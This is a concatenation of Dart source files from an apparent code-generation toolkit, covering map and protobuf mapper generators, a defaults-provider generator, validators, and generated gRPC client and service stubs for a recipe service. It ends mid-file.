class GetCustomClaimsCommand extends Command {
final String uid;
GetCustomClaimsCommand(
CommonOptions commonOptions,
this.uid,
) : super(commonOptions);
factory GetCustomClaimsCommand.fromResults(
CommonOptions commonOptions,
ArgResults results,
) {
final uid = results['uid'] as String;
return GetCustomClaimsCommand(commonOptions, uid);
}
static void addCommand(ArgParser parser) {
var cc = parser.addCommand('getCustomClaims');
cc.addOption(
'uid',
abbr: 'u',
help: 'UID of the user',
mandatory: true,
);
}
}
<|start_filename|>map_mapper/map_mapper_annotations/lib/src/default_key_handler.dart<|end_filename|>
import 'key_handler.dart';
class DefaultKeyHandler extends KeyHandler {
const DefaultKeyHandler();
@override
String keyFromMap(Map<String, dynamic> map, [String fieldName = '']) {
final mapKey = fieldNameToMapKey(fieldName);
return map[mapKey] ?? '';
}
@override
void keyToMap(Map<String, dynamic> map, String value,
[String fieldName = '']) {
final mapKey = fieldNameToMapKey(fieldName);
if (value.isEmpty) {
map.remove(mapKey);
} else {
map[mapKey] = value;
}
}
@override
String fieldNameToMapKey(String fieldName) {
switch (fieldName) {
case '':
case 'key':
return '_key';
default:
return fieldName;
}
}
}
<|start_filename|>map_mapper/test_mongo/lib/src/component.g.dart<|end_filename|>
// GENERATED CODE - DO NOT MODIFY BY HAND
part of 'component.dart';
// **************************************************************************
// MapMapGenerator
// **************************************************************************
class $ComponentMapMapper extends MapMapper<Component> {
const $ComponentMapMapper();
@override
Component fromMap(Map<String, dynamic> map) {
return Component(
description: map['description'] as String,
);
}
@override
Map<String, dynamic> toMap(Component instance) {
final map = <String, dynamic>{};
map['description'] = instance.description;
return map;
}
}
extension $ComponentMapExtension on Component {
Map<String, dynamic> toMap() => const $ComponentMapMapper().toMap(this);
static Component fromMap(Map<String, dynamic> map) =>
const $ComponentMapMapper().fromMap(map);
}
extension $MapComponentExtension on Map<String, dynamic> {
Component toComponent() => const $ComponentMapMapper().fromMap(this);
}
class $ComponentFieldNames {
final String fieldName;
final String prefix;
$ComponentFieldNames.sub(this.fieldName) : prefix = fieldName + '.';
const $ComponentFieldNames()
: fieldName = '',
prefix = '';
static const _description = 'description';
String get description => prefix + _description;
@override
String toString() => fieldName;
}
<|start_filename|>defaults_provider/test/lib/src/all_nullable.g.dart<|end_filename|>
// GENERATED CODE - DO NOT MODIFY BY HAND
part of 'all_nullable.dart';
// **************************************************************************
// DefaultsProviderGenerator
// **************************************************************************
class $AllNullableDefaultsProvider {
const $AllNullableDefaultsProvider();
AllNullable createWithDefaults() {
return AllNullable();
}
}
<|start_filename|>defaults_provider/defaults_provider_generator/lib/src/defaults_provider_generator.dart<|end_filename|>
import 'package:analyzer/dart/element/element.dart';
import 'package:build/build.dart';
import 'package:defaults_provider_annotations/defaults_provider_annotations.dart';
import 'package:defaults_provider_generator/src/field_code_generator.dart';
import 'package:source_gen/source_gen.dart';
import 'package:squarealfa_generators_common/squarealfa_generators_common.dart';
import 'field_descriptor.dart';
class DefaultsProviderGenerator
extends GeneratorForAnnotation<DefaultsProvider> {
@override
String generateForAnnotatedElement(
Element element,
ConstantReader annotation,
BuildStep buildStep,
) {
var validatable = _hydrateAnnotation(annotation);
var createBaseClass = validatable.createDefaultsProviderBaseClass;
try {
return generateDefaultsProvider(element, createBaseClass);
} catch (ex, stack) {
print('*** Exception: $ex with stack: $stack');
rethrow;
}
}
static String generateDefaultsProvider(
Element element, bool createBaseClass) {
var classElement = element.asClassElement();
if (classElement.kind == ElementKind.ENUM) return '';
var superTypeElement = classElement.supertype!.element;
var annotation = TypeChecker.fromRuntime(DefaultsProvider)
.firstAnnotationOf(superTypeElement);
final superClassHasDefaultsProvider = annotation != null;
final className = classElement.name;
final constructorFields = _getFieldDescriptors(classElement, true);
final parameterFieldBuffer = StringBuffer();
final constructorFieldBuffer = StringBuffer();
for (var field in constructorFields) {
parameterFieldBuffer
.writeln('${field.fieldElementTypeName}? ${field.displayName},');
constructorFieldBuffer.writeln(
'${field.displayName}: ${field.displayName} ?? this.${field.displayName},');
}
final propertyFields = _getFieldDescriptors(classElement, false);
final propertyFieldBuffer = StringBuffer();
for (var field in constructorFields) {
if (!superClassHasDefaultsProvider ||
propertyFields
.any((element) => element.displayName == field.displayName)) {
var gen =
FieldCodeGenerator.fromFieldDescriptor(field, createBaseClass);
propertyFieldBuffer.writeln(
'''${field.fieldElementTypeName} get ${field.displayName} ${createBaseClass && gen.defaultExpression == '' ? '' : ' => ' + gen.defaultExpression};''');
} else {
propertyFieldBuffer.writeln(
'''${field.fieldElementTypeName} get ${field.displayName} => _superDefaultsProvider.${field.displayName};''');
}
}
final providerClassName =
'\$${className}DefaultsProvider${createBaseClass ? 'Base' : ''}';
final superDeclaration = superClassHasDefaultsProvider
? '''static const _superDefaultsProvider = \$${superTypeElement.name}DefaultsProvider();'''
: '';
final constructor = classElement.isAbstract
? ''
: '''
$className createWithDefaults( ${parameterFieldBuffer.isEmpty ? '' : '{ $parameterFieldBuffer }'} ) {
return $className(
$constructorFieldBuffer
);
}
''';
return '''
${createBaseClass ? 'abstract' : ''} class $providerClassName {
const $providerClassName();
$superDeclaration
$constructor
$propertyFieldBuffer
}
''';
}
}
Iterable<FieldDescriptor> _getFieldDescriptors(
ClassElement classElement, bool includeInherited) {
final fieldSet =
classElement.getSortedFieldSet(includeInherited: includeInherited);
final fieldDescriptors = fieldSet
.map((fieldElement) => FieldDescriptor.fromFieldElement(fieldElement))
.where((element) => !element.isNullable);
return fieldDescriptors;
}
DefaultsProvider _hydrateAnnotation(ConstantReader reader) {
var defaultsProvider = DefaultsProvider(
createDefaultsProviderBaseClass:
reader.read('createDefaultsProviderBaseClass').literalValue as bool? ??
false,
);
return defaultsProvider;
}
<|start_filename|>defaults_provider/defaults_provider_generator/lib/src/field_descriptor.dart<|end_filename|>
import 'package:analyzer/dart/element/element.dart';
import 'package:defaults_provider_annotations/defaults_provider_annotations.dart';
import 'package:source_gen/source_gen.dart';
import 'package:squarealfa_generators_common/squarealfa_generators_common.dart';
class FieldDescriptor extends FieldDescriptorBase {
FieldDescriptor._(FieldElement fieldElement)
: super.fromFieldElement(fieldElement);
factory FieldDescriptor.fromFieldElement(FieldElement fieldElement) {
return FieldDescriptor._(fieldElement);
}
bool get typeHasDefaultsProvider {
var annotation = TypeChecker.fromRuntime(DefaultsProvider)
.firstAnnotationOf(fieldElementType.element!);
return annotation != null;
}
}
<|start_filename|>proto_mapper/proto_generator/lib/src/proto_services_mapper/proto_services_client_generator.dart<|end_filename|>
import 'package:analyzer/dart/element/element.dart';
import 'package:analyzer/dart/element/nullability_suffix.dart';
import 'package:build/build.dart';
import 'package:proto_annotations/proto_annotations.dart';
import 'package:proto_generator/src/proto_common.dart';
import 'package:proto_generator/src/proto_mapper/field_code_generator.dart';
import 'package:proto_generator/src/proto_mapper/field_descriptor.dart';
import 'package:source_gen/source_gen.dart';
import 'package:squarealfa_generators_common/squarealfa_generators_common.dart';
import '../proto_services_generator_base.dart';
import 'method_descriptor.dart';
class ProtoServicesClientGenerator
extends GeneratorForAnnotation<MapProtoServices> {
final BuilderOptions options;
late String _prefix;
late String _defaultPackage;
ProtoServicesClientGenerator(this.options) {
var config = options.config;
_prefix = config['prefix'] as String? ?? 'G';
_defaultPackage = config['package'] as String? ?? '';
}
@override
String generateForAnnotatedElement(
Element element,
ConstantReader annotation,
BuildStep buildStep,
) {
var readAnnotation = _hydrateAnnotation(annotation, prefix: _prefix);
final classElement = element.asClassElement();
final generator = _Generator(
annotation: readAnnotation,
classElement: classElement,
prefix: _prefix,
packageName: readAnnotation.packageName != '' ? '' : _defaultPackage,
);
var ret = generator.generateForClass();
return ret;
}
}
class _Generator extends ProtoServicesGeneratorBase {
final MapProtoServices annotation;
final Iterable<MethodDescriptor> methodDescriptors;
final String packageName;
_Generator({
required this.annotation,
required String prefix,
required ClassElement classElement,
required this.packageName,
}) : methodDescriptors = _getMethodDescriptors(classElement, annotation),
super(classElement: classElement, prefix: prefix);
String generateForClass() {
final methodBuffer = StringBuffer();
for (var methodDescriptor in methodDescriptors) {
final methodName = methodDescriptor.name;
if (!methodDescriptor.returnTypeIsFuture) {
// we can't know how to implement sync methods
continue;
}
final parameters = _getParameters(methodDescriptor);
final assignments = StringBuffer();
final gParm = _getGParameter(methodDescriptor, assignments);
final resultBuffer = StringBuffer();
final returnBuffer = StringBuffer();
final returnType =
_getReturnType(methodDescriptor, resultBuffer, returnBuffer);
methodBuffer.writeln('''
@override
Future<$returnType> $methodName($parameters) async {
final serviceClient = await get${prefix}ServiceClient();
final \$parm = $gParm;
$assignments
$resultBuffer await serviceClient.$methodName(\$parm);
$returnBuffer
}
''');
}
final className = classElement.name;
final serviceClassName = (className.endsWith('Base')
? className.substring(0, className.length - 'Base'.length)
: className.endsWith('Interface')
? className.substring(0, className.length - 'Interface'.length)
: className);
var ret = '''
abstract class ${serviceClassName}ClientBase implements $className {
Future<$prefix${serviceClassName}Client> get${prefix}ServiceClient();
$methodBuffer
}
''';
return ret;
}
String _getParameters(MethodDescriptor methodDescriptor) {
final parameters = StringBuffer();
for (final parm in methodDescriptor.methodElement.parameters) {
final pType = parm.type;
final pName = parm.displayName;
parameters.write('$pType $pName, ');
}
return parameters.toString();
}
String _getGParameter(
MethodDescriptor methodDescriptor,
StringBuffer assignments,
) {
final protoMappedParameter = _getProtoMappedParameter(methodDescriptor);
if (protoMappedParameter.isNotEmpty) return protoMappedParameter;
final messageName = getParameterMessageName(methodDescriptor.pascalName);
_addAssignments(methodDescriptor, assignments);
return '$messageName()';
}
void _addAssignments(
MethodDescriptor methodDescriptor, StringBuffer assignments) {
for (final parm in methodDescriptor.methodElement.parameters) {
final type = parm.type;
final fd = FieldDescriptor(
MapProto(
prefix: prefix,
packageName: packageName,
),
displayName: parm.displayName,
isFinal: true,
name: parm.name,
fieldElementType: type,
);
final fieldCodeGenerator = FieldCodeGenerator.fromFieldDescriptor(
fd,
refName: '',
protoRefName: '\$parm',
);
final expression = fieldCodeGenerator.toProtoMap;
assignments.writeln(expression);
}
}
String _getProtoMappedParameter(MethodDescriptor methodDescriptor) {
if (methodDescriptor.methodElement.parameters.length != 1) {
return '';
}
final finalType = methodDescriptor.parameterType.finalType;
if (!finalType.hasProto) return '';
final parmName =
methodDescriptor.methodElement.parameters.first.displayName;
final toProto = methodDescriptor.parameterType.futureType.isList
? '${prefix}ListOf$finalType(items: $parmName.map((i) => i.toProto()))'
: '$parmName.toProto()';
return toProto;
}
_getReturnType(
MethodDescriptor methodDescriptor,
StringBuffer resultBuffer,
StringBuffer returnBuffer,
) {
final protoMappedReturnType =
_getProtoMappedReturnType(methodDescriptor, resultBuffer, returnBuffer);
if (protoMappedReturnType.isNotEmpty) {
return protoMappedReturnType;
}
final rType = methodDescriptor.methodElement.returnType.futureType
.getDisplayString(withNullability: true);
final futureType = methodDescriptor.returnType.futureType;
if (futureType.isVoid) {
return rType;
}
final fd = FieldDescriptor(
MapProto(
prefix: prefix,
packageName: packageName,
),
displayName: 'value',
isFinal: true,
name: 'value',
fieldElementType: futureType,
);
final fieldCodeGenerator = FieldCodeGenerator.fromFieldDescriptor(
fd,
refName: '\$result',
);
resultBuffer.write(r'final $result = ');
final assignment = fieldCodeGenerator.fromProtoExpression;
returnBuffer.writeln('final \$ret = $assignment;');
returnBuffer.writeln(r'return $ret;');
return rType;
}
}
String _getProtoMappedReturnType(
MethodDescriptor methodDescriptor,
StringBuffer resultBuffer,
StringBuffer returnBuffer,
) {
final returnType = methodDescriptor.returnType;
final finalType = returnType.finalType;
if (finalType.isVoid) return '';
if (finalType.element?.kind == ElementKind.ENUM) return '';
if (!finalType.hasMapProto) return '';
if (returnType.futureType.nullabilitySuffix == NullabilitySuffix.question) {
return '';
}
final entityType = finalType.getDisplayString(withNullability: false);
final futureType = returnType.futureType;
final toEntity = returnType.futureType.isList
? '\$result.items.map((i) => i.to$entityType()).toList()'
: '\$result.to$entityType()';
resultBuffer.write(r'final $result = ');
returnBuffer.write('final \$ret = $toEntity;');
returnBuffer.write(r'return $ret;');
return futureType.getDisplayString(withNullability: true);
}
Iterable<MethodDescriptor> _getMethodDescriptors(
ClassElement classElement,
MapProtoServices annotation,
) {
final methods = classElement.getSortedMethods();
final methodDescriptors = methods
.map((fieldElement) => MethodDescriptor.fromMethodElement(
classElement,
fieldElement,
annotation,
))
.where((element) => element.isProtoIncluded);
return methodDescriptors;
}
MapProtoServices _hydrateAnnotation(ConstantReader reader,
{String prefix = ''}) {
var ret = MapProtoServices(
prefix: reader.read('prefix').literalValue as String? ?? prefix,
);
return ret;
}
<|start_filename|>entity/entity_generator/lib/src/validation/validators/null_validator.dart<|end_filename|>
import 'package:tuple/tuple.dart';
import '../field_descriptor.dart';
import 'property_validator.dart';
class NullValidator extends PropertyValidator {
@override
Tuple2<String, bool> createValidatorCode(
FieldDescriptor fieldDescriptor,
bool previousNullCheck,
) {
if (fieldDescriptor.isNullable) {
return createResult();
}
return createResult('''
if (value == null)
{
return RequiredValidationError('${fieldDescriptor.displayName}');
}
''', true);
}
}
<|start_filename|>proto_mapper/test/lib/src/recipe_services_base.dart<|end_filename|>
import 'package:grpc/grpc.dart';
import 'package:proto_annotations/proto_annotations.dart';
import 'package:proto_generator_test/grpc/calc_parameters.pb.dart';
import 'package:proto_generator_test/grpc/calc_result.pb.dart';
import 'package:proto_generator_test/grpc/key.pb.dart';
import 'package:proto_generator_test/grpc/recipe.pb.dart';
import 'package:proto_generator_test/grpc/recipe_services_base.services.pbgrpc.dart';
import 'package:proto_generator_test/grpc/recipe_type.pbenum.dart';
import 'package:proto_generator_test/src/calc_parameters.dart';
import 'package:proto_generator_test/src/calc_result.dart';
import 'package:proto_generator_test/src/crud_services_base.dart';
import 'package:proto_generator_test/src/recipe_type.dart';
import '../proto_generator_test.dart';
import 'key.dart';
part 'recipe_services_base.g.dart';
@protoServices
@mapProtoServices
abstract class RecipeServiceBase extends CrudServicesBase<Recipe> {
Future<List<Recipe>> search();
Future<List<Recipe>?> searchNullable();
Future<void> insertMany(List<Recipe> recipes);
Future<Recipe?> getNullable();
Future<int> count();
Future<int?> countNullable(bool returnNull);
Future<void> reindex();
Future<RecipeTypes> getMainRecipeType();
Future<RecipeTypes?> getMainRecipeTypeNullable();
Future<List<RecipeTypes>> getRecipeTypeList();
Future<List<RecipeTypes>?> getRecipeTypeListNullable();
Future<List<int>> getListOfInts();
Future<List<int>?> getListOfIntsNullable();
Future<CalcResult> doCalculation(CalcParameters parameters);
Future<void> receiveLotsOfArgs(
String pString,
int pInt,
RecipeTypes pRecipeTypes,
Recipe pRecipe,
List<String> pListStrings,
List<int> pListInts,
List<RecipeTypes> pListRecipeTypes,
List<Recipe> pListRecipes,
Set<String> pSetString,
Set<int> pSetInt,
Set<RecipeTypes> pSetRecipeTypes,
Set<Recipe> pSetRecipe,
Iterable<String> pIterableString,
Iterable<int> pIterableInt,
Iterable<RecipeTypes> pIterableRecipeTypes,
Iterable<Recipe> pIterableRecipe,
);
Future<List<int>> receiveLotsOfNullableArgs(
String? pString,
int? pInt,
RecipeTypes? pRecipeTypes,
Recipe? pRecipe,
List<String>? pListStrings,
List<int>? pListInts,
List<RecipeTypes>? pListRecipeTypes,
List<Recipe>? pListRecipes,
Set<String>? pSetString,
Set<int>? pSetInt,
Set<RecipeTypes>? pSetRecipeTypes,
Set<Recipe>? pSetRecipe,
Iterable<String>? pIterableString,
Iterable<int>? pIterableInt,
Iterable<RecipeTypes>? pIterableRecipeTypes,
Iterable<Recipe>? pIterableRecipe,
);
}
<|start_filename|>proto_mapper/proto_generator/lib/src/proto_mapper/field_code_generators/entity_field_code_generator.dart<|end_filename|>
import '../field_code_generator.dart';
import '../field_descriptor.dart';
class EntityFieldCodeGenerator extends FieldCodeGenerator {
EntityFieldCodeGenerator(
FieldDescriptor fieldDescriptor, {
String refName = FieldCodeGenerator.defaultRefName,
String protoRefName = FieldCodeGenerator.defaultProtoRefName,
}) : super(
fieldDescriptor,
refName: refName,
protoRefName: protoRefName,
);
@override
String get toProtoExpression =>
''' const \$${fieldDescriptor.fieldElementTypeName}ProtoMapper().toProto($instanceReference)''';
@override
String get fromProtoNonNullableExpression =>
''' const \$${fieldDescriptor.fieldElementTypeName}ProtoMapper().fromProto($ref$fieldName)''';
}
<|start_filename|>grpc_host/lib/src/hosting/hosting.dart<|end_filename|>
export 'services_host.dart';
export 'principal_interceptor.dart';
export 'host_parameters.dart';
export 'host.dart';
<|start_filename|>proto_mapper/test/lib/grpc/recipe_services_base.services.pbgrpc.dart<|end_filename|>
///
// Generated code. Do not modify.
// source: recipe_services_base.services.proto
//
// @dart = 2.12
// ignore_for_file: annotate_overrides,camel_case_types,unnecessary_const,non_constant_identifier_names,library_prefixes,unused_import,unused_shown_name,return_of_invalid_type,unnecessary_this,prefer_final_fields
import 'dart:async' as $async;
import 'dart:core' as $core;
import 'package:grpc/service_api.dart' as $grpc;
import 'recipe.pb.dart' as $0;
import 'key.pb.dart' as $1;
import 'recipe_services_base.services.pb.dart' as $2;
import 'calc_parameters.pb.dart' as $3;
import 'calc_result.pb.dart' as $4;
export 'recipe_services_base.services.pb.dart';
class GRecipeServiceClient extends $grpc.Client {
static final _$create = $grpc.ClientMethod<$0.GRecipe, $0.GRecipe>(
'/GRecipeService/Create',
($0.GRecipe value) => value.writeToBuffer(),
($core.List<$core.int> value) => $0.GRecipe.fromBuffer(value));
static final _$update = $grpc.ClientMethod<$0.GRecipe, $0.GRecipe>(
'/GRecipeService/Update',
($0.GRecipe value) => value.writeToBuffer(),
($core.List<$core.int> value) => $0.GRecipe.fromBuffer(value));
static final _$delete =
$grpc.ClientMethod<$1.GKey, $2.G_GRecipeService_Delete_Return>(
'/GRecipeService/Delete',
($1.GKey value) => value.writeToBuffer(),
($core.List<$core.int> value) =>
$2.G_GRecipeService_Delete_Return.fromBuffer(value));
static final _$get = $grpc.ClientMethod<$1.GKey, $0.GRecipe>(
'/GRecipeService/Get',
($1.GKey value) => value.writeToBuffer(),
($core.List<$core.int> value) => $0.GRecipe.fromBuffer(value));
static final _$search = $grpc.ClientMethod<
$2.G_GRecipeService_Search_Parameters, $0.GListOfRecipe>(
'/GRecipeService/Search',
($2.G_GRecipeService_Search_Parameters value) => value.writeToBuffer(),
($core.List<$core.int> value) => $0.GListOfRecipe.fromBuffer(value));
static final _$searchNullable = $grpc.ClientMethod<
$2.G_GRecipeService_SearchNullable_Parameters,
$2.G_GRecipeService_SearchNullable_Return>(
'/GRecipeService/SearchNullable',
($2.G_GRecipeService_SearchNullable_Parameters value) =>
value.writeToBuffer(),
($core.List<$core.int> value) =>
$2.G_GRecipeService_SearchNullable_Return.fromBuffer(value));
static final _$insertMany = $grpc.ClientMethod<$0.GListOfRecipe,
$2.G_GRecipeService_InsertMany_Return>(
'/GRecipeService/InsertMany',
($0.GListOfRecipe value) => value.writeToBuffer(),
($core.List<$core.int> value) =>
$2.G_GRecipeService_InsertMany_Return.fromBuffer(value));
static final _$getNullable = $grpc.ClientMethod<
$2.G_GRecipeService_GetNullable_Parameters,
$2.G_GRecipeService_GetNullable_Return>(
'/GRecipeService/GetNullable',
($2.G_GRecipeService_GetNullable_Parameters value) =>
value.writeToBuffer(),
($core.List<$core.int> value) =>
$2.G_GRecipeService_GetNullable_Return.fromBuffer(value));
static final _$count = $grpc.ClientMethod<
$2.G_GRecipeService_Count_Parameters,
$2.G_GRecipeService_Count_Return>(
'/GRecipeService/Count',
($2.G_GRecipeService_Count_Parameters value) => value.writeToBuffer(),
($core.List<$core.int> value) =>
$2.G_GRecipeService_Count_Return.fromBuffer(value));
static final _$countNullable = $grpc.ClientMethod<
$2.G_GRecipeService_CountNullable_Parameters,
$2.G_GRecipeService_CountNullable_Return>(
'/GRecipeService/CountNullable',
($2.G_GRecipeService_CountNullable_Parameters value) =>
value.writeToBuffer(),
($core.List<$core.int> value) =>
$2.G_GRecipeService_CountNullable_Return.fromBuffer(value));
static final _$reindex = $grpc.ClientMethod<
$2.G_GRecipeService_Reindex_Parameters,
$2.G_GRecipeService_Reindex_Return>(
'/GRecipeService/Reindex',
($2.G_GRecipeService_Reindex_Parameters value) => value.writeToBuffer(),
($core.List<$core.int> value) =>
$2.G_GRecipeService_Reindex_Return.fromBuffer(value));
static final _$getMainRecipeType = $grpc.ClientMethod<
$2.G_GRecipeService_GetMainRecipeType_Parameters,
$2.G_GRecipeService_GetMainRecipeType_Return>(
'/GRecipeService/GetMainRecipeType',
($2.G_GRecipeService_GetMainRecipeType_Parameters value) =>
value.writeToBuffer(),
($core.List<$core.int> value) =>
$2.G_GRecipeService_GetMainRecipeType_Return.fromBuffer(value));
static final _$getMainRecipeTypeNullable = $grpc.ClientMethod<
$2.G_GRecipeService_GetMainRecipeTypeNullable_Parameters,
$2.G_GRecipeService_GetMainRecipeTypeNullable_Return>(
'/GRecipeService/GetMainRecipeTypeNullable',
($2.G_GRecipeService_GetMainRecipeTypeNullable_Parameters value) =>
value.writeToBuffer(),
($core.List<$core.int> value) =>
$2.G_GRecipeService_GetMainRecipeTypeNullable_Return.fromBuffer(
value));
static final _$getRecipeTypeList = $grpc.ClientMethod<
$2.G_GRecipeService_GetRecipeTypeList_Parameters,
$2.G_GRecipeService_GetRecipeTypeList_Return>(
'/GRecipeService/GetRecipeTypeList',
($2.G_GRecipeService_GetRecipeTypeList_Parameters value) =>
value.writeToBuffer(),
($core.List<$core.int> value) =>
$2.G_GRecipeService_GetRecipeTypeList_Return.fromBuffer(value));
static final _$getRecipeTypeListNullable = $grpc.ClientMethod<
$2.G_GRecipeService_GetRecipeTypeListNullable_Parameters,
$2.G_GRecipeService_GetRecipeTypeListNullable_Return>(
'/GRecipeService/GetRecipeTypeListNullable',
($2.G_GRecipeService_GetRecipeTypeListNullable_Parameters value) =>
value.writeToBuffer(),
($core.List<$core.int> value) =>
$2.G_GRecipeService_GetRecipeTypeListNullable_Return.fromBuffer(
value));
static final _$getListOfInts = $grpc.ClientMethod<
$2.G_GRecipeService_GetListOfInts_Parameters,
$2.G_GRecipeService_GetListOfInts_Return>(
'/GRecipeService/GetListOfInts',
($2.G_GRecipeService_GetListOfInts_Parameters value) =>
value.writeToBuffer(),
($core.List<$core.int> value) =>
$2.G_GRecipeService_GetListOfInts_Return.fromBuffer(value));
static final _$getListOfIntsNullable = $grpc.ClientMethod<
$2.G_GRecipeService_GetListOfIntsNullable_Parameters,
$2.G_GRecipeService_GetListOfIntsNullable_Return>(
'/GRecipeService/GetListOfIntsNullable',
($2.G_GRecipeService_GetListOfIntsNullable_Parameters value) =>
value.writeToBuffer(),
($core.List<$core.int> value) =>
$2.G_GRecipeService_GetListOfIntsNullable_Return.fromBuffer(value));
static final _$doCalculation =
$grpc.ClientMethod<$3.GCalcParameters, $4.GCalcResult>(
'/GRecipeService/DoCalculation',
($3.GCalcParameters value) => value.writeToBuffer(),
($core.List<$core.int> value) => $4.GCalcResult.fromBuffer(value));
static final _$receiveLotsOfArgs = $grpc.ClientMethod<
$2.G_GRecipeService_ReceiveLotsOfArgs_Parameters,
$2.G_GRecipeService_ReceiveLotsOfArgs_Return>(
'/GRecipeService/ReceiveLotsOfArgs',
($2.G_GRecipeService_ReceiveLotsOfArgs_Parameters value) =>
value.writeToBuffer(),
($core.List<$core.int> value) =>
$2.G_GRecipeService_ReceiveLotsOfArgs_Return.fromBuffer(value));
static final _$receiveLotsOfNullableArgs = $grpc.ClientMethod<
$2.G_GRecipeService_ReceiveLotsOfNullableArgs_Parameters,
$2.G_GRecipeService_ReceiveLotsOfNullableArgs_Return>(
'/GRecipeService/ReceiveLotsOfNullableArgs',
($2.G_GRecipeService_ReceiveLotsOfNullableArgs_Parameters value) =>
value.writeToBuffer(),
($core.List<$core.int> value) =>
$2.G_GRecipeService_ReceiveLotsOfNullableArgs_Return.fromBuffer(
value));
GRecipeServiceClient($grpc.ClientChannel channel,
{$grpc.CallOptions? options,
$core.Iterable<$grpc.ClientInterceptor>? interceptors})
: super(channel, options: options, interceptors: interceptors);
$grpc.ResponseFuture<$0.GRecipe> create($0.GRecipe request,
{$grpc.CallOptions? options}) {
return $createUnaryCall(_$create, request, options: options);
}
$grpc.ResponseFuture<$0.GRecipe> update($0.GRecipe request,
{$grpc.CallOptions? options}) {
return $createUnaryCall(_$update, request, options: options);
}
$grpc.ResponseFuture<$2.G_GRecipeService_Delete_Return> delete(
$1.GKey request,
{$grpc.CallOptions? options}) {
return $createUnaryCall(_$delete, request, options: options);
}
$grpc.ResponseFuture<$0.GRecipe> get($1.GKey request,
{$grpc.CallOptions? options}) {
return $createUnaryCall(_$get, request, options: options);
}
$grpc.ResponseFuture<$0.GListOfRecipe> search(
$2.G_GRecipeService_Search_Parameters request,
{$grpc.CallOptions? options}) {
return $createUnaryCall(_$search, request, options: options);
}
$grpc.ResponseFuture<$2.G_GRecipeService_SearchNullable_Return>
searchNullable($2.G_GRecipeService_SearchNullable_Parameters request,
{$grpc.CallOptions? options}) {
return $createUnaryCall(_$searchNullable, request, options: options);
}
$grpc.ResponseFuture<$2.G_GRecipeService_InsertMany_Return> insertMany(
$0.GListOfRecipe request,
{$grpc.CallOptions? options}) {
return $createUnaryCall(_$insertMany, request, options: options);
}
$grpc.ResponseFuture<$2.G_GRecipeService_GetNullable_Return> getNullable(
$2.G_GRecipeService_GetNullable_Parameters request,
{$grpc.CallOptions? options}) {
return $createUnaryCall(_$getNullable, request, options: options);
}
$grpc.ResponseFuture<$2.G_GRecipeService_Count_Return> count(
$2.G_GRecipeService_Count_Parameters request,
{$grpc.CallOptions? options}) {
return $createUnaryCall(_$count, request, options: options);
}
$grpc.ResponseFuture<$2.G_GRecipeService_CountNullable_Return> countNullable(
$2.G_GRecipeService_CountNullable_Parameters request,
{$grpc.CallOptions? options}) {
return $createUnaryCall(_$countNullable, request, options: options);
}
$grpc.ResponseFuture<$2.G_GRecipeService_Reindex_Return> reindex(
$2.G_GRecipeService_Reindex_Parameters request,
{$grpc.CallOptions? options}) {
return $createUnaryCall(_$reindex, request, options: options);
}
$grpc.ResponseFuture<$2.G_GRecipeService_GetMainRecipeType_Return>
getMainRecipeType(
$2.G_GRecipeService_GetMainRecipeType_Parameters request,
{$grpc.CallOptions? options}) {
return $createUnaryCall(_$getMainRecipeType, request, options: options);
}
$grpc.ResponseFuture<$2.G_GRecipeService_GetMainRecipeTypeNullable_Return>
getMainRecipeTypeNullable(
$2.G_GRecipeService_GetMainRecipeTypeNullable_Parameters request,
{$grpc.CallOptions? options}) {
return $createUnaryCall(_$getMainRecipeTypeNullable, request,
options: options);
}
$grpc.ResponseFuture<$2.G_GRecipeService_GetRecipeTypeList_Return>
getRecipeTypeList(
$2.G_GRecipeService_GetRecipeTypeList_Parameters request,
{$grpc.CallOptions? options}) {
return $createUnaryCall(_$getRecipeTypeList, request, options: options);
}
$grpc.ResponseFuture<$2.G_GRecipeService_GetRecipeTypeListNullable_Return>
getRecipeTypeListNullable(
$2.G_GRecipeService_GetRecipeTypeListNullable_Parameters request,
{$grpc.CallOptions? options}) {
return $createUnaryCall(_$getRecipeTypeListNullable, request,
options: options);
}
$grpc.ResponseFuture<$2.G_GRecipeService_GetListOfInts_Return> getListOfInts(
$2.G_GRecipeService_GetListOfInts_Parameters request,
{$grpc.CallOptions? options}) {
return $createUnaryCall(_$getListOfInts, request, options: options);
}
$grpc.ResponseFuture<$2.G_GRecipeService_GetListOfIntsNullable_Return>
getListOfIntsNullable(
$2.G_GRecipeService_GetListOfIntsNullable_Parameters request,
{$grpc.CallOptions? options}) {
return $createUnaryCall(_$getListOfIntsNullable, request, options: options);
}
$grpc.ResponseFuture<$4.GCalcResult> doCalculation($3.GCalcParameters request,
{$grpc.CallOptions? options}) {
return $createUnaryCall(_$doCalculation, request, options: options);
}
$grpc.ResponseFuture<$2.G_GRecipeService_ReceiveLotsOfArgs_Return>
receiveLotsOfArgs(
$2.G_GRecipeService_ReceiveLotsOfArgs_Parameters request,
{$grpc.CallOptions? options}) {
return $createUnaryCall(_$receiveLotsOfArgs, request, options: options);
}
$grpc.ResponseFuture<$2.G_GRecipeService_ReceiveLotsOfNullableArgs_Return>
receiveLotsOfNullableArgs(
$2.G_GRecipeService_ReceiveLotsOfNullableArgs_Parameters request,
{$grpc.CallOptions? options}) {
return $createUnaryCall(_$receiveLotsOfNullableArgs, request,
options: options);
}
}
abstract class GRecipeServiceBase extends $grpc.Service {
$core.String get $name => 'GRecipeService';
GRecipeServiceBase() {
$addMethod($grpc.ServiceMethod<$0.GRecipe, $0.GRecipe>(
'Create',
create_Pre,
false,
false,
($core.List<$core.int> value) => $0.GRecipe.fromBuffer(value),
($0.GRecipe value) => value.writeToBuffer()));
$addMethod($grpc.ServiceMethod<$0.GRecipe, $0.GRecipe>(
'Update',
update_Pre,
false,
false,
($core.List<$core.int> value) => $0.GRecipe.fromBuffer(value),
($0.GRecipe value) => value.writeToBuffer()));
$addMethod($grpc.ServiceMethod<$1.GKey, $2.G_GRecipeService_Delete_Return>(
'Delete',
delete_Pre,
false,
false,
($core.List<$core.int> value) => $1.GKey.fromBuffer(value),
($2.G_GRecipeService_Delete_Return value) => value.writeToBuffer()));
$addMethod($grpc.ServiceMethod<$1.GKey, $0.GRecipe>(
'Get',
get_Pre,
false,
false,
($core.List<$core.int> value) => $1.GKey.fromBuffer(value),
($0.GRecipe value) => value.writeToBuffer()));
$addMethod($grpc.ServiceMethod<$2.G_GRecipeService_Search_Parameters,
$0.GListOfRecipe>(
'Search',
search_Pre,
false,
false,
($core.List<$core.int> value) =>
$2.G_GRecipeService_Search_Parameters.fromBuffer(value),
($0.GListOfRecipe value) => value.writeToBuffer()));
$addMethod($grpc.ServiceMethod<
$2.G_GRecipeService_SearchNullable_Parameters,
